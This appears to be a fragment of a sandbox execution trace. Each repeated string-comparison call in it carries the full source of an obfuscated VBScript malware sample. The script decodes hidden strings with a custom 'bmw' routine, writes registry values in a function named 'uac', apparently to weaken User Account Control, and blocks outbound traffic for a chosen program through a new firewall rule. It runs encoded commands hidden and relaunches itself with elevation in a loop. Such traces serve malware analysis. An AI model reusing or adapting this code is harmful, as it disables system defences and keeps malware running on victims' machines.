bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0222.968] wcsncmp (_String1=")\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.968] wcsncmp (_String1="\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -30 [0222.968] wcsncmp (_String1="\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.968] wcsncmp (_String1="\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 